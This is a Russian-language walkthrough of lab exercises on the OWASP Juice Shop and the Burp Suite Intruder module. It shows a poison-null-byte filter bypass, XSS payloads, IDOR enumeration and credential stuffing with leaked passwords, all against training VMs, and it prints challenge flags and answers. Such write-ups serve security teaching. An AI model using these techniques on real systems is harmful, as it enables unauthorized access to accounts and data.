В большинстве случаев защита данных не применяется единообразно во всем веб-приложении, что делает некоторые страницы доступными для общественности. В других случаях информация утекает в открытый доступ без ведома разработчика, что делает веб-приложение уязвимым для атак.

Дополнительная информация: Раскрытие конфиденциальных данных

Мы скачаем файл acquisitions.md и сохраним его. Похоже, здесь есть и другие файлы, представляющие интерес.

После загрузки перейдите на главную страницу , чтобы получить флаг!

You successfully solved a challenge: Confidential Document (Access a confidential document.)
Ответ: 8d2072c6b0a455608ca1a293dc0c9579883fc6a5

Вопрос №2: Войдите в учетную запись MC SafeSearch!

После просмотра видеоклипа некоторые фрагменты песни особенно запомнились.

Он отмечает, что его пароль — « Mr. Noodles », но он заменил некоторые « гласные на нули », то есть заменил только буквы «о» на нули.

Теперь нам известно, что пароль к учетной записи mc.safesearch@juice-sh.op — « Mr. N00dles ».

You successfully solved a challenge: Login MC SafeSearch (Log in with MC SafeSearch's original user credentials without applying SQL Injection or any other bypass.)
Ответ: bb105418e73708ceccf1a7b2491f434b8f5230e4

Вопрос №3: Скачайте файл резервной копии!

Теперь вернёмся в папку http://10.112.152.24/ftp/ и попробуем загрузить package.json.bak. Но, похоже, мы получаем ошибку 403, которая указывает, что можно загрузить только файлы .md и .pdf.

Чтобы обойти это ограничение, мы воспользуемся обходным путем для символов, называемым «ядовитым нулевым байтом». Ядовитый нулевой байт выглядит так: %00 .

Примечание: поскольку мы можем загрузить его по URL-адресу , нам потребуется закодировать его в формат, закодированный по URL-адресу.

Теперь "пустой байт" будет выглядеть так: %2500 . Добавление этого и расширения .md в конец позволит обойти ошибку 403!

Почему это работает?

«Отравленный нулевой байт» — это, по сути, нулевой символ-терминатор. Поместив нулевой символ в строку в определенном байте, вы дадите серверу команду завершить строку в этой точке, обнулив остальную часть строки.

You successfully solved a challenge: Poison Null Byte (Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.)
Ответ: cfdeea14e8f01b4952722fd0e4a77f1928593c9a

6. Кто управляет этой штуковиной?

Современные системы позволяют нескольким пользователям иметь доступ к разным страницам. Администраторы чаще всего используют страницу администрирования для редактирования, добавления и удаления различных элементов веб-сайта. Вы можете использовать такие страницы при создании веб-сайта с помощью таких программ, как Weebly или Wix.

Обнаружение уязвимостей или ошибок в системе контроля доступа будет классифицировано по одному из двух типов :

Горизонтальная эскалация привилегий

Это происходит, когда пользователь может выполнить действие или получить доступ к данным другого пользователя с тем же уровнем прав доступа.

Вертикальная эскалация привилегий

Это происходит, когда пользователь может выполнить действие или получить доступ к данным другого пользователя с более высоким уровнем прав доступа.

Источник: Packetlabs.net

Дополнительная информация: Нарушение контроля доступа

Вопрос №1: Зайдите на страницу администрирования!

Сначала откроем отладчик в Firefox .

(Или источники в Chrome .)

Это можно сделать, перейдя по соответствующей ссылке в меню «Веб-разработчики».

Затем мы обновим страницу и найдем файл JavaScript для main-es2015.js.

Затем мы перейдём на эту страницу по адресу : http://10.112.152.24/main-es2015.js

Чтобы преобразовать текст в читаемый формат, нажмите кнопку { } внизу.

Теперь выполните поиск по запросу "admin".

Вы встретите несколько разных слов, содержащих "admin", но нам нужно слово "path: administration".

Это указывает на страницу под названием " /#/administration ", как видно из пути к разделу "О программе" несколькими строками ниже, но перейти на неё, не войдя в систему, не получится.

Поскольку это страница администратора, логично, что для ее просмотра нам необходимо войти в учетную запись администратора .

Хороший способ предотвратить доступ пользователей к этой информации — загружать только те части приложения, которые им необходимы. Это предотвратит утечку или просмотр конфиденциальной информации, такой как страница администратора.

Вопрос №2: Посмотрите корзину покупок другого пользователя!

Войдите в свою учетную запись администратора и нажмите «Ваша корзина». Убедитесь, что Burp запущен, чтобы вы могли перехватить запрос!

Пересылайте каждый запрос, пока не увидите: GET /rest/basket/1 HTTP/1.1

Теперь мы изменим цифру 1 после /basket/ на 2.

Теперь отобразится корзина пользователя с ID 2. Вы можете сделать это и для других пользователей с ID, при условии, что у них есть корзина!

IDOR - получили доступ до чужой корзины.

Ответ: e6982b34b6734ceadd28e5019b251f929a80b815

Снова перейдите на страницу http://10.112.152.24 /#/administration и нажмите на значок корзины рядом с отзывом, отмеченным 5 звездами!

Ответ:78231b75c0b2180b7e964dcbb1ab3c3f58639f2e

7. Откуда это взялось?

XSS , или межсайтовый скриптинг, — это уязвимость, позволяющая злоумышленникам запускать JavaScript в веб-приложениях. Это одна из наиболее распространенных уязвимостей в веб-приложениях. Сложность таких уязвимостей варьируется от простых до чрезвычайно сложных, поскольку каждое веб-приложение обрабатывает запросы по-своему.

Существует три основных типа XSS -атак:

DOM (Special)

DOM XSS (Document Object Model-based Cross-site Scripting) использует HTML-среду для выполнения вредоносного JavaScript. Этот тип атаки обычно использует HTML-тег <script></script> .

Постоянное (на стороне сервера)

Постоянная XSS-атака — это JavaScript-код, который выполняется при загрузке сервером страницы, содержащей этот код. Она может возникать, когда сервер не проверяет данные пользователя при их загрузке на страницу. Такие атаки часто встречаются в сообщениях блогов.

Отражённый (на стороне клиента)

Отражённая XSS-атака — это JavaScript-код, выполняемый на стороне клиента веб-приложения. Чаще всего она встречается, когда сервер не проверяет правильность поисковых данных.

Дополнительная информация: Межсайтовая скриптовая атака (XSS)

Вопрос №1: Выполните DOM XSS-атаку!

Мы будем использовать элемент iframe с тегом `<alert>` на JavaScript:

<iframe src="javascript:alert(`xss`)">

Ввод этого текста в строку поиска вызовет всплывающее окно.

Обратите внимание, что мы используем iframe , который является распространенным HTML-элементом, встречающимся во многих веб-приложениях; существуют и другие элементы, которые также дают аналогичный результат.

Этот тип XSS, также называемый XFS (Cross-Frame Scripting), является одним из наиболее распространенных способов обнаружения XSS в веб-приложениях.

Веб-сайты, позволяющие пользователю изменять iframe или другие элементы DOM, с наибольшей вероятностью будут уязвимы для XSS-атак.

Почему это работает?

Обычно поисковая строка отправляет запрос на сервер, который затем возвращает соответствующую информацию, но именно здесь кроется недостаток. Без надлежащей проверки входных данных мы можем осуществить XSS-атаку на поисковую строку.

Вопрос №2: Выполните постоянную XSS-атаку!

Сначала войдите в свою учетную запись администратора .

Для этой атаки мы перейдём на страницу " Последний IP-адрес входа ".

Должно быть указано, что последний IP-адрес — 0.0.0.0 или 10.xxx.

Поскольку в лог записывается «последний» IP-адрес входа, мы сейчас выйдем из системы, чтобы в лог записался «новый» IP-адрес.

Убедитесь, что функция перехвата запросов Burp включена , чтобы она перехватывала запросы на выход из системы.

Затем перейдём на вкладку «Заголовки», где добавим новый заголовок:

Затем перенаправьте запрос на сервер!
При повторном входе в учетную запись администратора и переходе на страницу с IP-адресом последнего входа вы увидите предупреждение об XSS-атаке!

Зачем нам отправлять этот заголовок?

Заголовок True-Client-IP аналогичен заголовку X-Forwarded-For ; оба сообщают серверу или прокси-серверу IP-адрес клиента. Поскольку в заголовке отсутствует проверка подлинности, мы можем выполнить XSS-атаку.

Вопрос №3: Выполните отражённую XSS-атаку!

Во-первых, нам нужно правильно настроиться, чтобы выполнить отраженную XSS-атаку!

Войдите в свою учетную запись администратора и перейдите на страницу « История заказов ».

Там вы увидите значок « Грузовик », нажав на него, вы перейдете на страницу результатов отслеживания. Вы также увидите, что заказу присвоен идентификатор.

Вместо кода 5267-f73dcd000abcc353 мы будем использовать XSS-атаку с использованием iframe, <iframe src="javascript:alert(`xss`)">.

После отправки URL-адреса обновите страницу, и вы получите предупреждение о XSS-атаке!

Почему это работает?

На сервере будет таблица соответствия или база данных (в зависимости от типа сервера) для каждого идентификатора отслеживания. Поскольку параметр 'id' не проходит проверку перед отправкой на сервер, мы можем выполнить XSS-атаку.

Вопрос №1: Выполните DOM XSS-атаку!

4a31a4fe0954199566e360a873802bf64d0d0a84

Вопрос №2: Выполните постоянную XSS-атаку!

c37da14686b69a220fd9febd09bb9593e7d0539f

Вопрос №3: Выполните отражённую XSS-атаку!

305021787d3e9cd9cebc057a021c2504550bb3b6

8. Исследование!

Если вы хотите попробовать свои силы в более сложных заданиях, не рассмотренных в этой комнате, загляните в раздел /#/score-board/ на Juice-shop. Там вы сможете увидеть выполненные вами задания, а также задания различной сложности.

Перейдите на страницу /#/score-board/

2614339936e8282e2f820f023d4d998a1f95e02a

День 38. Burp Suite: Intruder

2026-02-24T13:48:05.338Z

Узнайте, как использовать Intruder для автоматизации запросов в Burp Suite.

1. Введение

Добро пожаловать в номер "Burp Suite Intruder"!

В этой комнате мы рассмотрим модуль Intruder в Burp Suite , который обеспечивает автоматическую обработку запросов и позволяет выполнять такие задачи, как фаззинг и брутфорс. Если вы не знакомы с функционалом Proxy и Repeater в Burp Suite , рекомендуется пройти хотя бы комнату «Основы Burp» перед тем, как продолжить.

Модуль Intruder в Burp Suite — это мощный инструмент, позволяющий проводить автоматизированные и настраиваемые атаки. Он предоставляет возможность изменять определенные части запроса и выполнять повторяющиеся тесты с различными вариантами входных данных. Intruder особенно полезен для таких задач, как фаззинг и брутфорс, где необходимо проверять различные значения по отношению к целевому объекту.

Разверните целевую виртуальную машину, подключенную к этой задаче, нажав зеленую кнопку «Запустить машину» .

2. Что такое Intruder?

Intruder — это встроенный в Burp Suite инструмент фаззинга, позволяющий автоматически изменять запросы и проводить многократное тестирование с вариациями входных значений. Используя перехваченный запрос (часто из модуля Proxy ), Intruder может отправлять несколько запросов с немного измененными значениями на основе заданных пользователем конфигураций. Он служит различным целям, таким как подбор паролей в формах авторизации путем замены полей имени пользователя и пароля значениями из списка слов или выполнение фаззинговых атак с использованием списков слов для тестирования подкаталогов, конечных точек или виртуальных хостов. Функциональность Intruder сравнима с инструментами командной строки, такими как Wfuzz или ffuf .

Однако важно отметить, что, хотя Intruder можно использовать с Burp Community Edition, он имеет ограничения по количеству запросов, что значительно снижает его скорость по сравнению с Burp Professional. Это ограничение часто заставляет специалистов по безопасности полагаться на другие инструменты для фаззинга и перебора паролей. Тем не менее, Intruder остается ценным инструментом, и стоит научиться эффективно его использовать.

Давайте рассмотрим интерфейс Intruder:

На начальном этапе Intruder отображается простой интерфейс, где мы можем выбрать цель. Это поле будет уже заполнено, если запрос был отправлен из прокси (используя Ctrl + Iили щелкнув правой кнопкой мыши и выбрав «Отправить в Intruder»).

В Intruder есть четыре вкладки:

Позиции : На этой вкладке мы можем выбрать тип атаки (который мы рассмотрим в следующем задании) и настроить место вставки полезных нагрузок в шаблон запроса.
Полезные нагрузки : Здесь мы можем выбрать значения для вставки в позиции, определенные на вкладке «Позиции» . Доступны различные варианты полезных нагрузок, например, загрузка элементов из списка слов. Способ вставки этих полезных нагрузок в шаблон зависит от типа атаки, выбранного на вкладке «Позиции» . Вкладка «Полезные нагрузки» также позволяет изменять поведение Intruder в отношении полезных нагрузок, например, определять правила предварительной обработки для каждой полезной нагрузки (например, добавление префикса или суффикса, выполнение сопоставления и замены или пропуск полезных нагрузок на основе определенного регулярного выражения).
Пул ресурсов : Эта вкладка не особенно полезна в Burp Community Edition. Она позволяет распределять ресурсы между различными автоматизированными задачами в Burp Professional. Без доступа к этим автоматизированным задачам эта вкладка имеет ограниченное значение.
Настройки : Эта вкладка позволяет настроить поведение атаки. В основном она касается того, как Burp обрабатывает результаты и саму атаку. Например, мы можем помечать запросы, содержащие определенный текст, или определить ответ Burp как перенаправляющий (3xx) ответы.

Примечание: Термин «фаззинг» относится к процессу проверки функциональности или существования путем применения набора данных к параметру. Например, фаззинг для конечных точек в веб-приложении включает в себя взятие каждого слова из списка слов и добавление его к URL-адресу запроса (например, http ://MACHINE_IP/WORD_GOES_HERE) для наблюдения за ответом сервера.

Вопрос: На какой вкладке «Вторжение» можно указать «Тип атаки» для планируемой атаки?

Ответ:Positions

3. Должности

При использовании Burp Suite Intruder для проведения атаки первым шагом является анализ позиций в запросе, куда мы хотим внедрить наши полезные нагрузки. Эти позиции сообщают Intruder о местах, куда будут внедрены наши полезные нагрузки (как мы рассмотрим в следующих заданиях).

Перейдём к вкладке «Позиции»:

Обратите внимание, что Burp Suite автоматически пытается определить наиболее вероятные места для внедрения полезной нагрузки. Эти места выделены зеленым цветом и заключены в разделительные знаки ( §).

В правой части интерфейса расположены следующие кнопки: Add §, Clear §, и Auto §:

Эта Add §кнопка позволяет вручную задавать новые позиции, выделяя их в редакторе запросов и затем нажимая на кнопку.
Кнопка Clear §удаляет все заданные позиции, предоставляя чистый холст, на котором мы можем определить свои собственные позиции.
Кнопка Auto §автоматически пытается определить наиболее вероятные позиции на основе запроса. Эта функция полезна, если мы ранее удалили позиции по умолчанию и хотим их восстановить.

Следующая GIF-анимация демонстрирует процесс добавления, удаления и автоматического повторного выбора позиций:

Уделите время ознакомлению с функциями добавления, удаления и автоматического выбора позиций в интерфейсе Burp Suite Intruder.

Вопрос: Какой символ обозначает начало и конец положения полезной нагрузки?

Ответ: §

4. Полезная нагрузка

На вкладке «Полезные нагрузки» в Burp Suite Intruder мы можем создавать, назначать и настраивать полезные нагрузки для нашей атаки. Эта подвкладка разделена на четыре раздела:

Комплекты полезной нагрузки :

В этом разделе мы можем выбрать позицию, для которой хотим настроить набор полезной нагрузки, а также выбрать тип полезной нагрузки, которую хотим использовать.
При использовании типов атак, допускающих только один набор полезной нагрузки (снайперская или таранная ) , в выпадающем списке «Набор полезной нагрузки» будет только один вариант, независимо от количества заданных позиций.
Если мы используем типы атак, требующие нескольких комплектов полезной нагрузки (вилы или кассетная бомба), то в выпадающем списке для каждой позиции будет отдельный пункт.
Примечание: При присвоении номеров в раскрывающемся списке «Набор полезной нагрузки» для нескольких позиций следуйте порядку сверху вниз, слева направо. Например, при наличии двух позиций ( username=§pentester§&password=§Expl01ted§), первый элемент в раскрывающемся списке набора полезной нагрузки будет относиться к полю имени пользователя, а второй — к полю пароля.

Настройки полезной нагрузки :

В этом разделе представлены параметры, специфичные для выбранного типа полезной нагрузки в текущем наборе полезной нагрузки.
Например, при использовании типа полезной нагрузки «Простой список» мы можем вручную добавлять или удалять полезные нагрузки из набора с помощью текстового поля «Добавить» , «Вставить строки» или «Загрузить полезные нагрузки из файла». Кнопка «Удалить» удаляет текущую выбранную строку, а кнопка «Очистить» очищает весь список. Будьте осторожны при загрузке больших списков, так как это может привести к сбою Burp.
Для каждого типа полезной нагрузки предусмотрен свой набор опций и функциональных возможностей. Изучите доступные варианты, чтобы понять весь спектр возможностей.

Обработка полезной нагрузки :

В этом разделе мы можем определить правила, которые будут применяться к каждому элементу полезной нагрузки в наборе перед его отправкой на целевое устройство.
Например, мы можем сделать каждое слово заглавным, пропустить данные, соответствующие шаблону регулярного выражения, или применить другие преобразования или фильтрацию.
Хотя вы, возможно, не будете часто использовать этот раздел, он может оказаться чрезвычайно полезным, когда для вашей атаки требуется специфическая обработка полезной нагрузки.

Кодирование полезной нагрузки :

Этот раздел позволяет нам настраивать параметры кодирования для наших полезных нагрузок.
По умолчанию Burp Suite применяет кодирование URL-адресов для обеспечения безопасной передачи данных. Однако могут быть случаи, когда необходимо изменить режим кодирования.
Мы можем переопределить параметры кодирования URL-адреса по умолчанию, изменив список символов для кодирования или сняв флажок «Кодировать эти символы для URL-адреса».

Используя эти разделы, мы можем создавать и настраивать наборы полезных нагрузок в соответствии со специфическими требованиями наших атак. Такой уровень контроля позволяет нам точно настраивать полезные нагрузки для эффективного тестирования и эксплуатации.

Вопрос: Какое правило обработки полезной нагрузки можно использовать для добавления символов в конец каждой полезной нагрузки в наборе?

Ответ: Add suffix

5. Введение в типы атак

Вкладка «Позиции» в Burp Suite Intruder содержит выпадающее меню для выбора типа атаки. Intruder предлагает четыре типа атак, каждый из которых служит определенной цели. Давайте рассмотрим каждый из них:

Sniper - Снайперская атака : Тип атаки «Снайперская атака» является вариантом по умолчанию и наиболее часто используемым. Он циклически перебирает полезные нагрузки, внедряя по одной полезной нагрузке за раз в каждую позицию, определенную в запросе. Снайперские атаки последовательно перебирают все полезные нагрузки, что позволяет проводить точное и целенаправленное тестирование.
Battering ram - Таран : Тип атаки «Таран » отличается от «Снайперской атаки» тем, что он отправляет все полезные нагрузки одновременно, при этом каждая полезная нагрузка устанавливается на свою позицию. Этот тип атаки полезен при проверке условий гонки или когда необходимо одновременно отправлять полезные нагрузки.
Pitchfork - Атака типа «Вилы »: Атака типа «Вилы» позволяет одновременно тестировать несколько позиций с использованием различных полезных нагрузок. Она позволяет тестировщику определить несколько наборов полезных нагрузок, каждый из которых связан с определенной позицией в запросе. Атаки типа «Вилы» эффективны, когда существуют различные параметры, требующие отдельного тестирования.
Cluster bomb - Кассетная бомба : Тип атаки «Кассетная бомба» сочетает в себе подходы «Снайпер» и «Вилы». Она выполняет атаку, подобную снайперской, на каждой позиции, но одновременно проверяет все полезные нагрузки из каждого набора. Этот тип атаки полезен, когда несколько позиций имеют разные полезные нагрузки, и мы хотим проверить их все вместе.

Каждый тип атаки имеет свои преимущества и подходит для различных сценариев тестирования. Понимание их различий помогает нам выбрать подходящий тип атаки в зависимости от целей тестирования.

Вопрос: Какой тип атаки циклически перебирает полезные нагрузки, внедряя по одной полезной нагрузке за раз в каждую позицию, определенную в запросе?

Ответ: Sniper

6. Снайпер

Тип атаки «Снайпер» — это тип атаки по умолчанию и наиболее часто используемый в Burp Suite Intruder. Он особенно эффективен для атак с захватом одной позиции, таких как подбор паролей методом перебора или фаззинг для API- интерфейсов. При атаке «Снайпер» мы предоставляем набор полезных нагрузок, которые могут представлять собой список слов или диапазон чисел, и Intruder вставляет каждую полезную нагрузку в каждую определенную позицию в запросе.

Давайте обратимся к нашему предыдущему примеру шаблона:

Примеры должностей

POST /support/login/ HTTP/1.1
Хост: 10.49.191.239
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Длина контента: 37
Источник: http:// 10.49.191.239
Соединение: закрыто
Источник: http:// 10.49.191.239 /support/login/
Запросы на обновление, небезопасные и некорректные: 1

имя пользователя = §pentester§ & пароль = §Expl01ted§

В этом примере у нас определены две позиции для параметров тела usernameатаки password. В атаке типа «Снайпер» Intruder берет каждый полезный груз из набора полезных нагрузок и по очереди подставляет его в каждую определенную позицию.

Предположим, у нас есть список из трех слов: burp, suite, и intruder. Тогда Intruder сгенерирует шесть запросов:

Обратите внимание, как Intruder начинает с первой позиции ( username) и подставляет в нее каждую полезную нагрузку, затем переходит ко второй позиции ( password) и выполняет ту же замену полезных нагрузок. Общее количество запросов, сделанных Intruder Sniper, можно рассчитать как requests = numberOfWords * numberOfPositions.

Тип атаки «Снайпер» полезен, когда мы хотим провести тесты с атаками в одной позиции, используя разные полезные нагрузки для каждой позиции. Он позволяет проводить точное тестирование и анализ различных вариантов полезных нагрузок.

Вопрос: Если бы вы использовали Sniper для фаззинга трех параметров в запросе со списком слов, содержащим 100 слов, сколько запросов потребовалось бы отправить Burp Suite для завершения атаки?

Ответ: 300

Вопрос: Сколько комплектов полезной нагрузки примет Sniper для проведения атаки?

Ответ: 1

7. Таран

Тип атаки «Таран » в Burp Suite Intruder отличается от «Снайпера» тем, что он размещает один и тот же груз во всех позициях одновременно, а не заменяет каждый груз в каждой позиции по очереди.

Вернемся к нашему предыдущему примеру шаблона:

Примеры должностей

POST /support/login/ HTTP/1.1
    Хост: 10.49.191.239
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Длина контента: 37
    Источник: http:// 10.49.191.239
    Соединение: закрыто
    Источник: http:// 10.49.191.239 /support/login/
    Запросы на обновление, небезопасные и некорректные: 1
    
    имя пользователя = §pentester§ & пароль = §Expl01ted§

Используя атаку типа «Таран» с тем же списком слов, что и раньше ( burp, suite, и intruder), Intruder сгенерирует три запроса:

Как показано в таблице, каждый фрагмент кода из списка слов вставляется в каждую позицию для каждого запроса. При атаке типа «таран» один и тот же фрагмент кода одновременно помещается в каждую определенную позицию, что обеспечивает подход к тестированию, подобный методу перебора.

Атака типа «таран » полезна, когда мы хотим проверить одну и ту же полезную нагрузку одновременно в нескольких позициях без необходимости последовательной замены.

В следующих заданиях мы рассмотрим дополнительные конфигурации и настройки, связанные с типом атаки «Таран» в игре Intruder , и изучим его применение в различных сценариях.

Вопрос: В качестве гипотетического вопроса: Вам необходимо выполнить атаку типа «таран» (Battering ram Intruder) на приведенный выше пример запроса.

Если у вас есть список слов, содержащий два слова ( adminи Guest), и позиции в шаблоне запроса выглядят следующим образом:
username=§pentester§&password=§Expl01ted§

Какие параметры будут в теле первого запроса , отправляемого Burp Suite?

Ответ: username=admin&password=admin

8. Вилы

Тип атаки «Вилы» в Burp Suite Intruder похож на одновременную атаку «Снайпер». В то время как «Снайпер» использует один набор полезной нагрузки для одновременной проверки всех позиций, «Вилы» используют один набор полезной нагрузки на каждую позицию (максимум до 20) и перебирают их все одновременно.

Чтобы лучше понять Pitchfork, давайте вернемся к нашему примеру с перебором, но на этот раз с двумя списками слов:

Первый список слов содержит имена пользователей: joel, harriet, и alex.
Второй список слов содержит пароли: J03l, Emma1815, и Sk1ll.

Мы можем использовать эти два списка для проведения атаки типа «вилы» на форму входа в систему. Каждый запрос, сделанный во время атаки, будет выглядеть следующим образом:

Как показано в таблице, Pitchfork берет первый элемент из каждого списка и подставляет его в запрос, по одному на позицию. Затем он повторяет этот процесс для следующего запроса, беря второй элемент из каждого списка и подставляя его в шаблон. Intruder продолжает эту итерацию до тех пор, пока один или все списки не исчерпают свои элементы. Важно отметить, что Intruder прекращает проверку, как только один из списков будет заполнен. Поэтому в атаках Pitchfork идеально, чтобы наборы полезной нагрузки имели одинаковую длину. Если длина наборов полезной нагрузки различается, Intruder будет отправлять запросы только до тех пор, пока не будет исчерпан более короткий список, а оставшиеся элементы в более длинном списке проверяться не будут.

Атака типа «Вилы» особенно полезна при проведении атак с подбором учетных данных или когда для нескольких позиций требуются отдельные наборы полезной нагрузки. Она позволяет одновременно тестировать несколько позиций с различными полезными нагрузками.

В следующих заданиях мы рассмотрим дополнительные конфигурации и настройки, связанные с типом атаки Pitchfork от Intruder, и изучим его применение в различных сценариях, включая атаки с подбором учетных данных.

Вопрос: Каково максимальное количество комплектов полезной нагрузки, которые мы можем загрузить в Intruder в режиме Pitchfork?

Ответ: 20

9. Кассетная бомба

Тип атаки «Кластерная бомба» в Burp Suite Intruder позволяет выбирать несколько наборов полезной нагрузки, по одному на каждую позицию (максимум до 20). В отличие от Pitchfork, где все наборы полезной нагрузки проверяются одновременно, «Кластерная бомба» перебирает каждый набор полезной нагрузки по отдельности, гарантируя проверку каждой возможной комбинации полезных нагрузок.

Для иллюстрации типа атаки «Кластерная бомба» воспользуемся теми же списками слов, что и раньше:

Имена пользователей: joel, harriet, и alex.
Пароли: J03l, Emma1815, и Sk1ll.

В этом примере предположим, что мы не знаем, какой пароль принадлежит какому пользователю. У нас есть три пользователя и три пароля, но их соответствие неизвестно. В этом случае мы можем использовать атаку типа «кластерная бомба», чтобы перебрать все возможные комбинации значений. Таблица запросов для позиций имени пользователя и пароля будет выглядеть следующим образом:

Как показано в таблице, тип атаки «Кластерная бомба» перебирает все возможные комбинации предоставленных наборов полезной нагрузки. Он проверяет каждую возможность, подставляя каждое значение из каждого набора полезной нагрузки в соответствующую позицию в запросе.

Атаки типа «кластерная бомба» могут генерировать значительный объем трафика, поскольку проверяют каждую комбинацию. Количество запросов, выполняемых атакой типа «кластерная бомба», можно рассчитать, умножив количество строк в каждом наборе полезной нагрузки. Важно проявлять осторожность при использовании этого типа атаки, особенно при работе с большими наборами полезной нагрузки. Кроме того, при использовании Burp Community и его функции ограничения скорости Intruder выполнение атаки типа «кластерная бомба» с набором полезной нагрузки среднего размера может занять значительно больше времени.

Тип атаки «Кластерная бомба» особенно полезен для сценариев подбора учетных данных методом перебора, когда соответствие между именами пользователей и паролями неизвестно.

В следующих заданиях мы рассмотрим дополнительные конфигурации и настройки, связанные с типом атаки «Кластерная бомба» в Intruder, и изучим ее применение в различных сценариях.

Вопрос:

У нас есть три набора полезной нагрузки. Первый набор содержит 100 строк, второй — 2 строки, а третий — 30 строк.

Сколько запросов выполнит Intruder, используя эти наборы полезной нагрузки, в атаке с применением кластерной бомбы?

Ответ:6000 (100 * 2 * 30)

10. Практический пример

Чтобы применить наши теоретические знания на практике, мы попытаемся получить доступ к порталу поддержки, расположенному по адресу [адрес портала] http://10.49.129.42/support/login. Этот портал имеет стандартную структуру авторизации, и, изучив его исходный код, мы обнаруживаем, что никаких мер защиты не реализовано:

Исходный код формы входа в систему поддержки

---
<form method="POST">
    <div class="form-floating mb-3">
        <input class="form-control" type="text" name=username  placeholder="Username" required>
        <label for="username">Username</label>
    </div>
    <div class="form-floating mb-3">
        <input class="form-control" type="password" name=password  placeholder="Password" required>
        <label for="password">Password</label>
    </div>
    <div class="d-grid"><button class="btn btn-primary btn-lg" type="submit">Login!</button></div>
</form>
---

Ввиду отсутствия защитных мер у нас есть несколько вариантов использования этой уязвимости, включая атаку кассетными бомбами для подбора учетных данных методом перебора. Однако в нашем распоряжении есть и более простой подход.

Примерно три месяца назад компания Bastion Hosting стала жертвой кибератаки, в результате которой были скомпрометированы имена пользователей, адреса электронной почты и пароли сотрудников в открытом виде. Хотя пострадавшим сотрудникам было рекомендовано незамедлительно сменить пароли, существует вероятность, что некоторые проигнорировали этот совет.

Поскольку у нас есть список известных имен пользователей, каждое из которых сопровождается соответствующим паролем, мы можем использовать атаку с подбором учетных данных вместо прямого перебора. Этот метод оказывается более выгодным и значительно быстрее, особенно при использовании версии Intruder с ограничением скорости запросов. Чтобы получить доступ к утёкшим учетным данным, загрузите файл с целевого компьютера, используя следующую команду в AttackBox: wget http://10.49.129.42:9999/Credentials/BastionHostingCreds.zip

Учебное пособие

Для решения этой задачи выполните следующие шаги, чтобы провести атаку с использованием украденных учетных данных с помощью макросов Burp:

Скачайте и подготовьте списки слов:
Эти списки содержат информацию об утечках электронных писем, имен пользователей и паролей соответственно. Последний список содержит объединенные списки электронных писем и паролей. Мы будем использовать эти usernames.txtсписки passwords.txt.

Скачайте и распакуйте файл BastionHostingCreds.zip.
В извлеченной папке найдите следующие списки слов:

emails.txt
usernames.txt
passwords.txt
combined.txt

Перейдите по указанному адресу http://10.49.129.42/support/loginв вашем браузере. Активируйте Burp Proxy и попробуйте войти в систему, перехватив запрос в вашем прокси. Обратите внимание, что для этого шага подойдут любые учетные данные.

Отправьте перехваченный запрос из прокси-сервера в Intruder, щелкнув правой кнопкой мыши и выбрав «Отправить в Intruder» или используя Ctrl + I.

На вкладке "Позиции" убедитесь, что выбраны только параметры имени пользователя и пароля. Снимите все дополнительные флажки, такие как сессионные cookie.

Установите тип атаки на «Вилы».

Перейдите на вкладку "Полезные нагрузки". Вы найдете два набора полезных нагрузок, доступных для полей имени пользователя и пароля.

В первом наборе полезной нагрузки (для имен пользователей) перейдите в раздел «Параметры полезной нагрузки», выберите «Загрузить» и выберите нужный usernames.txtпункт из списка.

Повторите тот же процесс для второго набора данных (для паролей), используя passwords.txtсписок.

Нажмите кнопку «Начать атаку» , чтобы начать атаку с использованием подбора учетных данных. Может появиться предупреждение об ограничении скорости запросов; нажмите «ОК» , чтобы продолжить. Атака займет несколько минут в Burp Community.

После начала атаки в новом окне отобразятся результаты запросов. Однако, поскольку Burp отправил 100 запросов, нам необходимо определить, какой из них (или какие) оказался (были) успешным. Поскольку коды состояния ответа не позволяют различать успешные и неудачные попытки (все они представляют собой перенаправления 302), нам необходимо использовать длину ответа для их различения. Чтобы отсортировать результаты по длине в байтах, щелкните заголовок столбца «Длина». Найдите запрос с меньшей длиной ответа, что указывает на успешную попытку входа в систему.

Для подтверждения успешной попытки входа в систему используйте учетные данные из запроса с более короткой длиной ответа.

получаем

Payload 1: m.rivera
Payload 2: letmein1

Вопрос: Какая комбинация имени пользователя и пароля указывает на успешный вход в систему? Формат ответа: "имя пользователя:пароль".

Ответ: m.rivera:letmein1

11. Практическая задача

Получив доступ к системе поддержки, мы теперь можем изучить ее функциональные возможности и посмотреть, какие действия мы можем выполнить.

При переходе на главную страницу отображается таблица с различными заявками. Нажатие на любую строку перенаправляет на страницу, где можно просмотреть полную заявку. Изучив структуру URL-адресов, мы видим, что эти страницы пронумерованы в следующем формате:

http://10.49.129.42/support/ticket/NUMBER

Система нумерации указывает на то, что билетам присваиваются целочисленные идентификаторы, а не сложные и трудноугадываемые номера. Эта информация важна, поскольку она предполагает два возможных сценария:

Контроль доступа : Конечная точка может быть правильно настроена для ограничения доступа только к заявкам, назначенным текущему пользователю. В этом случае мы можем просматривать только заявки, связанные с нашей учетной записью.
Уязвимость IDOR : Кроме того, на конечной точке могут отсутствовать надлежащие средства контроля доступа, что приводит к уязвимости, известной как небезопасные прямые ссылки на объекты (IDOR). В этом случае мы потенциально можем использовать уязвимость системы и прочитать все существующие билеты, независимо от назначенного пользователя.

Для дальнейшего исследования мы воспользуемся инструментом Intruder для фаззинга /support/ticket/NUMBERконечной точки. Этот подход поможет нам определить, правильно ли настроена конечная точка или присутствует ли уязвимость типа IDOR . Давайте приступим к процессу фаззинга!

забираем страничку в интрудер

указываем что перебираем

в пайлоде указываем числа и ставим от 0 до 1000

Атака

Видим что нашлось 6 - 57 - 78 - мы про них знали, но появились новые 47 и 83

83 - итог идор уязвимость есть

Примечание: Вам необходимо отправить запрос, находясь в системе.

Вопрос: Какой тип атаки лучше всего подходит для решения этой задачи?

Ответ: Sniper

Вопрос: Что это за флаг?

Ответ:THM{MTMxNTg5NTUzMWM0OWRlYzUzMDVjMzJl}

12. Испытание «Дополнительная миля»

